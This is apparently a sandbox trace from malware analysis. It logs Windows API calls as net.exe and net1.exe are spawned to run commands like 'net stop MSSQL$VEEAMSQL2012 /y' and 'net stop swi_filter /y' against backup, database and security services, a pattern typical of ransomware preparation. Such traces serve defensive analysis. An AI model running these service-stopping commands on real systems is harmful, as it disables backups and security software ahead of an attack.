_wcsicmp (_String1="share", _String2="stop") returned -12 [0211.758] _wcsicmp (_String1="start", _String2="stop") returned -14 [0211.758] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0211.758] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0211.758] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0211.758] _wcsicmp (_String1="accounts", _String2="SQLAgent$SBSMONITORING") returned -18 [0211.758] _wcsicmp (_String1="computer", _String2="SQLAgent$SBSMONITORING") returned -16 [0211.758] _wcsicmp (_String1="config", _String2="SQLAgent$SBSMONITORING") returned -16 [0211.758] _wcsicmp (_String1="continue", _String2="SQLAgent$SBSMONITORING") returned -16 [0211.758] _wcsicmp (_String1="cont", _String2="SQLAgent$SBSMONITORING") returned -16 [0211.758] _wcsicmp (_String1="file", _String2="SQLAgent$SBSMONITORING") returned -13 [0211.758] _wcsicmp (_String1="files", _String2="SQLAgent$SBSMONITORING") returned -13 [0211.758] _wcsicmp (_String1="group", _String2="SQLAgent$SBSMONITORING") returned -12 [0211.758] _wcsicmp (_String1="groups", _String2="SQLAgent$SBSMONITORING") returned -12 [0211.758] _wcsicmp (_String1="help", _String2="SQLAgent$SBSMONITORING") returned -11 [0211.758] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$SBSMONITORING") returned -11 [0211.758] _wcsicmp (_String1="localgroup", _String2="SQLAgent$SBSMONITORING") returned -7 [0211.758] _wcsicmp (_String1="pause", _String2="SQLAgent$SBSMONITORING") returned -3 [0211.758] _wcsicmp (_String1="session", _String2="SQLAgent$SBSMONITORING") returned -12 [0211.758] _wcsicmp (_String1="sessions", _String2="SQLAgent$SBSMONITORING") returned -12 [0211.758] _wcsicmp (_String1="sess", _String2="SQLAgent$SBSMONITORING") returned -12 [0211.758] _wcsicmp (_String1="share", _String2="SQLAgent$SBSMONITORING") returned -9 [0211.758] _wcsicmp (_String1="start", _String2="SQLAgent$SBSMONITORING") returned 3 [0211.758] _wcsicmp (_String1="stats", _String2="SQLAgent$SBSMONITORING") returned 3 [0211.758] _wcsicmp (_String1="statistics", _String2="SQLAgent$SBSMONITORING") returned 3 [0211.758] _wcsicmp (_String1="stop", _String2="SQLAgent$SBSMONITORING") returned 3 [0211.758] _wcsicmp (_String1="time", _String2="SQLAgent$SBSMONITORING") returned 1 [0211.758] _wcsicmp (_String1="user", _String2="SQLAgent$SBSMONITORING") returned 2 [0211.758] _wcsicmp (_String1="users", _String2="SQLAgent$SBSMONITORING") returned 2 [0211.759] _wcsicmp (_String1="msg", _String2="SQLAgent$SBSMONITORING") returned -6 [0211.759] _wcsicmp (_String1="messenger", _String2="SQLAgent$SBSMONITORING") returned -6 [0211.759] _wcsicmp (_String1="receiver", _String2="SQLAgent$SBSMONITORING") returned -1 [0211.759] _wcsicmp (_String1="rcv", _String2="SQLAgent$SBSMONITORING") returned -1 [0211.759] _wcsicmp (_String1="netpopup", _String2="SQLAgent$SBSMONITORING") returned -5 [0211.759] _wcsicmp (_String1="redirector", _String2="SQLAgent$SBSMONITORING") returned -1 [0211.759] _wcsicmp (_String1="redir", _String2="SQLAgent$SBSMONITORING") returned -1 [0211.759] _wcsicmp (_String1="rdr", _String2="SQLAgent$SBSMONITORING") returned -1 [0211.759] _wcsicmp (_String1="workstation", _String2="SQLAgent$SBSMONITORING") returned 4 [0211.759] _wcsicmp (_String1="work", _String2="SQLAgent$SBSMONITORING") returned 4 [0211.759] _wcsicmp (_String1="wksta", _String2="SQLAgent$SBSMONITORING") returned 4 [0211.759] _wcsicmp (_String1="prdr", _String2="SQLAgent$SBSMONITORING") returned -3 [0211.759] _wcsicmp (_String1="devrdr", _String2="SQLAgent$SBSMONITORING") returned -15 [0211.759] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$SBSMONITORING") returned -7 [0211.759] _wcsicmp (_String1="server", _String2="SQLAgent$SBSMONITORING") returned -12 [0211.759] _wcsicmp (_String1="svr", _String2="SQLAgent$SBSMONITORING") returned 5 [0211.759] _wcsicmp (_String1="srv", _String2="SQLAgent$SBSMONITORING") returned 1 [0211.759] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$SBSMONITORING") returned -7 [0211.759] _wcsicmp (_String1="alerter", _String2="SQLAgent$SBSMONITORING") returned -18 [0211.759] _wcsicmp (_String1="netlogon", _String2="SQLAgent$SBSMONITORING") returned -5 [0211.759] _wcsupr (in: _String="SQLAgent$SBSMONITORING" | out: _String="SQLAGENT$SBSMONITORING") returned="SQLAGENT$SBSMONITORING" [0211.759] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2e54c8 [0211.762] GetServiceKeyNameW (in: hSCManager=0x2e54c8, lpDisplayName="SQLAGENT$SBSMONITORING", lpServiceName=0x4faaf0, lpcchBuffer=0x2cf6ec | out: lpServiceName="", lpcchBuffer=0x2cf6ec) returned 0 [0211.762] _wcsicmp (_String1="msg", _String2="SQLAGENT$SBSMONITORING") returned -6 [0211.762] _wcsicmp (_String1="messenger", _String2="SQLAGENT$SBSMONITORING") returned -6 [0211.762] _wcsicmp (_String1="receiver", _String2="SQLAGENT$SBSMONITORING") returned -1 [0211.762] _wcsicmp (_String1="rcv", _String2="SQLAGENT$SBSMONITORING") returned -1 [0211.762] _wcsicmp (_String1="redirector", _String2="SQLAGENT$SBSMONITORING") returned -1 [0211.762] _wcsicmp (_String1="redir", _String2="SQLAGENT$SBSMONITORING") returned -1 [0211.762] _wcsicmp (_String1="rdr", _String2="SQLAGENT$SBSMONITORING") returned -1 [0211.762] _wcsicmp (_String1="workstation", _String2="SQLAGENT$SBSMONITORING") returned 4 [0211.762] _wcsicmp (_String1="work", _String2="SQLAGENT$SBSMONITORING") returned 4 [0211.762] _wcsicmp (_String1="wksta", _String2="SQLAGENT$SBSMONITORING") returned 4 [0211.762] _wcsicmp (_String1="prdr", _String2="SQLAGENT$SBSMONITORING") returned -3 [0211.762] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$SBSMONITORING") returned -15 [0211.763] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$SBSMONITORING") returned -7 [0211.763] _wcsicmp (_String1="server", _String2="SQLAGENT$SBSMONITORING") returned -12 [0211.763] _wcsicmp (_String1="svr", _String2="SQLAGENT$SBSMONITORING") returned 5 [0211.763] _wcsicmp (_String1="srv", _String2="SQLAGENT$SBSMONITORING") returned 1 [0211.763] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$SBSMONITORING") returned -7 [0211.763] _wcsicmp (_String1="alerter", _String2="SQLAGENT$SBSMONITORING") returned -18 [0211.763] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$SBSMONITORING") returned -5 [0211.763] NetServiceControl (in: servername=0x0, service="SQLAGENT$SBSMONITORING", opcode=0x0, arg=0x0, bufptr=0x2cf6e8 | out: bufptr=0x2cf6e8) returned 0x889 [0211.764] wcscpy_s (in: _Destination=0x4fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0211.764] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0211.764] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x4fb338, nSize=0x800, Arguments=0x4f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0211.765] GetFileType (hFile=0x26c) returned 0x3 [0211.765] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2e3ca0 [0211.765] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2e3ca0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0211.765] WriteFile (in: hFile=0x26c, lpBuffer=0x2e3ca0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2cf628, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf628, lpOverlapped=0x0) returned 0 [0211.765] LocalFree (hMem=0x2e3ca0) returned 0x0 [0211.766] GetFileType (hFile=0x26c) returned 0x3 [0211.766] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e6290 [0211.766] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2 [0211.766] WriteFile (in: hFile=0x26c, lpBuffer=0x2e6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf628, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf628, lpOverlapped=0x0) returned 0 [0211.766] LocalFree (hMem=0x2e6290) returned 0x0 [0211.766] _ultow (in: _Dest=0x889, _Radix=2946648 | out: _Dest=0x889) returned="2185" [0211.766] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x4fb338, nSize=0x800, Arguments=0x4f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0211.766] GetFileType (hFile=0x26c) returned 0x3 [0211.766] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2e6290 [0211.766] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2e6290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0211.766] WriteFile (in: hFile=0x26c, lpBuffer=0x2e6290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2cf634, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf634, lpOverlapped=0x0) returned 0 [0211.766] LocalFree (hMem=0x2e6290) returned 0x0 [0211.766] GetFileType (hFile=0x26c) returned 0x3 [0211.766] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e6290 [0211.766] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2 [0211.766] WriteFile (in: hFile=0x26c, lpBuffer=0x2e6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf634, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf634, lpOverlapped=0x0) returned 0 [0211.766] LocalFree (hMem=0x2e6290) returned 0x0 [0211.767] NetApiBufferFree (Buffer=0x2e1c90) returned 0x0 [0211.767] NetApiBufferFree (Buffer=0x2e1ca8) returned 0x0 [0211.767] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SBSMONITORING /y" [0211.767] exit (_Code=2) Process: id = "300" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6b2b2000" os_pid = "0x888" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$VEEAMSQL2012 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 473 os_tid = 0x820 Process: id = "301" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5ec0d000" os_pid = "0x914" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "300" os_parent_pid = "0x888" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2012 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 474 os_tid = 0x3d0 [0211.922] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fd14 | out: lpSystemTimeAsFileTime=0x16fd14*(dwLowDateTime=0x47812020, dwHighDateTime=0x1d57a87)) [0211.922] GetCurrentProcessId () returned 0x914 [0211.922] GetCurrentThreadId () returned 0x3d0 [0211.922] GetTickCount () returned 0x116e8e9 [0211.922] QueryPerformanceCounter (in: lpPerformanceCount=0x16fd0c | out: lpPerformanceCount=0x16fd0c*=33220697633) returned 1 [0211.923] GetModuleHandleA (lpModuleName=0x0) returned 0x890000 [0211.923] __set_app_type (_Type=0x1) [0211.923] __p__fmode () returned 0x74eb31f4 [0211.923] __p__commode () returned 0x74eb31fc [0211.923] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x89ffe6) returned 0x0 [0211.923] __getmainargs (in: _Argc=0x8a9064, _Argv=0x8a906c, _Env=0x8a9068, _DoWildCard=0, _StartInfo=0x8a9024 | out: _Argc=0x8a9064, _Argv=0x8a906c, _Env=0x8a9068) returned 0 [0211.923] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0211.923] GetConsoleOutputCP () returned 0x1b5 [0211.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x8a9080 | out: lpCPInfo=0x8a9080) returned 1 [0211.924] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.926] sprintf_s (in: _DstBuf=0x16fccc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0211.927] setlocale (category=0, locale=".437") returned="English_United States.437" [0211.929] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0211.929] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0211.929] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2012 /y" [0211.929] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16fa98, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0211.929] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x78) returned 0x5ff790 [0211.929] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0211.929] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16fc9c | out: Buffer=0x16fc9c*=0x601c80) returned 0x0 [0211.929] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16fc9c | out: Buffer=0x16fc9c*=0x601c98) returned 0x0 [0211.929] _fileno (_File=0x74eb2900) returned -2 [0211.929] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0211.929] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0211.929] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0211.929] _wcsicmp (_String1="config", _String2="stop") returned -16 [0211.930] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0211.930] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0211.930] _wcsicmp (_String1="file", _String2="stop") returned -13 [0211.930] _wcsicmp (_String1="files", _String2="stop") returned -13 [0211.930] _wcsicmp (_String1="group", _String2="stop") returned -12 [0211.930] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0211.930] _wcsicmp (_String1="help", _String2="stop") returned -11 [0211.930] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0211.930] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0211.930] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0211.930] _wcsicmp (_String1="session", _String2="stop") returned -15 [0211.930] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0211.930] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0211.930] _wcsicmp (_String1="share", _String2="stop") returned -12 [0211.930] _wcsicmp (_String1="start", _String2="stop") returned -14 [0211.930] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0211.930] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0211.930] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0211.930] _wcsicmp (_String1="accounts", _String2="MSSQL$VEEAMSQL2012") returned -12 [0211.930] _wcsicmp (_String1="computer", _String2="MSSQL$VEEAMSQL2012") returned -10 [0211.930] _wcsicmp (_String1="config", _String2="MSSQL$VEEAMSQL2012") returned -10 [0211.930] _wcsicmp (_String1="continue", _String2="MSSQL$VEEAMSQL2012") returned -10 [0211.930] _wcsicmp (_String1="cont", _String2="MSSQL$VEEAMSQL2012") returned -10 [0211.930] _wcsicmp (_String1="file", _String2="MSSQL$VEEAMSQL2012") returned -7 [0211.930] _wcsicmp (_String1="files", _String2="MSSQL$VEEAMSQL2012") returned -7 [0211.930] _wcsicmp (_String1="group", _String2="MSSQL$VEEAMSQL2012") returned -6 [0211.930] _wcsicmp (_String1="groups", _String2="MSSQL$VEEAMSQL2012") returned -6 [0211.930] _wcsicmp (_String1="help", _String2="MSSQL$VEEAMSQL2012") returned -5 [0211.930] _wcsicmp (_String1="helpmsg", _String2="MSSQL$VEEAMSQL2012") returned -5 [0211.930] _wcsicmp (_String1="localgroup", _String2="MSSQL$VEEAMSQL2012") returned -1 [0211.930] _wcsicmp (_String1="pause", _String2="MSSQL$VEEAMSQL2012") returned 3 [0211.930] _wcsicmp (_String1="session", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.930] _wcsicmp (_String1="sessions", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.930] _wcsicmp (_String1="sess", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.930] _wcsicmp (_String1="share", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.930] _wcsicmp (_String1="start", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.930] _wcsicmp (_String1="stats", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.931] _wcsicmp (_String1="statistics", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.931] _wcsicmp (_String1="stop", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.931] _wcsicmp (_String1="time", _String2="MSSQL$VEEAMSQL2012") returned 7 [0211.931] _wcsicmp (_String1="user", _String2="MSSQL$VEEAMSQL2012") returned 8 [0211.931] _wcsicmp (_String1="users", _String2="MSSQL$VEEAMSQL2012") returned 8 [0211.931] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2012") returned -12 [0211.931] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2012") returned -14 [0211.931] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2012") returned 5 [0211.931] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2012") returned 5 [0211.931] _wcsicmp (_String1="netpopup", _String2="MSSQL$VEEAMSQL2012") returned 1 [0211.931] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2012") returned 5 [0211.931] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2012") returned 5 [0211.931] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2012") returned 5 [0211.931] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2012") returned 10 [0211.931] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2012") returned 10 [0211.931] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2012") returned 10 [0211.931] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2012") returned 3 [0211.931] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2012") returned -9 [0211.931] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2012") returned -1 [0211.931] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.931] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.931] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.931] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2012") returned -1 [0211.931] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2012") returned -12 [0211.931] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2012") returned 1 [0211.931] _wcsupr (in: _String="MSSQL$VEEAMSQL2012" | out: _String="MSSQL$VEEAMSQL2012") returned="MSSQL$VEEAMSQL2012" [0211.931] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x605468 [0211.934] GetServiceKeyNameW (in: hSCManager=0x605468, lpDisplayName="MSSQL$VEEAMSQL2012", lpServiceName=0x8aaaf0, lpcchBuffer=0x16fc38 | out: lpServiceName="", lpcchBuffer=0x16fc38) returned 0 [0211.934] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2012") returned -12 [0211.934] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2012") returned -14 [0211.934] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2012") returned 5 [0211.935] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2012") returned 5 [0211.935] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2012") returned 5 [0211.935] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2012") returned 5 [0211.935] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2012") returned 5 [0211.935] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2012") returned 10 [0211.935] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2012") returned 10 [0211.935] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2012") returned 10 [0211.935] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2012") returned 3 [0211.935] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2012") returned -9 [0211.935] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2012") returned -1 [0211.935] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.935] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.935] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2012") returned 6 [0211.935] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2012") returned -1 [0211.935] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2012") returned -12 [0211.935] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2012") returned 1 [0211.935] NetServiceControl (in: servername=0x0, service="MSSQL$VEEAMSQL2012", opcode=0x0, arg=0x0, bufptr=0x16fc34 | out: bufptr=0x16fc34) returned 0x889 [0211.936] wcscpy_s (in: _Destination=0x8aa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0211.936] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0211.937] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x8ab338, nSize=0x800, Arguments=0x8a9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0211.938] GetFileType (hFile=0x26c) returned 0x3 [0211.938] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x603f98 [0211.938] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x603f98, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0211.938] WriteFile (in: hFile=0x26c, lpBuffer=0x603f98, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x16fb74, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fb74, lpOverlapped=0x0) returned 0 [0211.938] LocalFree (hMem=0x603f98) returned 0x0 [0211.938] GetFileType (hFile=0x26c) returned 0x3 [0211.938] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x606240 [0211.938] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x606240, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n`", lpUsedDefaultChar=0x0) returned 2 [0211.938] WriteFile (in: hFile=0x26c, lpBuffer=0x606240, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16fb74, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fb74, lpOverlapped=0x0) returned 0 [0211.938] LocalFree (hMem=0x606240) returned 0x0 [0211.938] _ultow (in: _Dest=0x889, _Radix=1506212 | out: _Dest=0x889) returned="2185" [0211.938] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x8ab338, nSize=0x800, Arguments=0x8a9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0211.938] GetFileType (hFile=0x26c) returned 0x3 [0211.938] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x606240 [0211.938] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x606240, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0211.938] WriteFile (in: hFile=0x26c, lpBuffer=0x606240, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16fb80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fb80, lpOverlapped=0x0) returned 0 [0211.938] LocalFree (hMem=0x606240) returned 0x0 [0211.938] GetFileType (hFile=0x26c) returned 0x3 [0211.938] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x606240 [0211.938] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x606240, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n`", lpUsedDefaultChar=0x0) returned 2 [0211.938] WriteFile (in: hFile=0x26c, lpBuffer=0x606240, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16fb80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16fb80, lpOverlapped=0x0) returned 0 [0211.938] LocalFree (hMem=0x606240) returned 0x0 [0211.939] NetApiBufferFree (Buffer=0x601c80) returned 0x0 [0211.939] NetApiBufferFree (Buffer=0x601c98) returned 0x0 [0211.939] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2012 /y" [0211.939] exit (_Code=2) Process: id = "302" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6beb7000" os_pid = "0x92c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop swi_filter /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 475 os_tid = 0x128 Process: id = "303" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6f0f8000" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "302" os_parent_pid = "0x92c" cmd_line = "C:\\Windows\\system32\\net1 stop swi_filter /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" 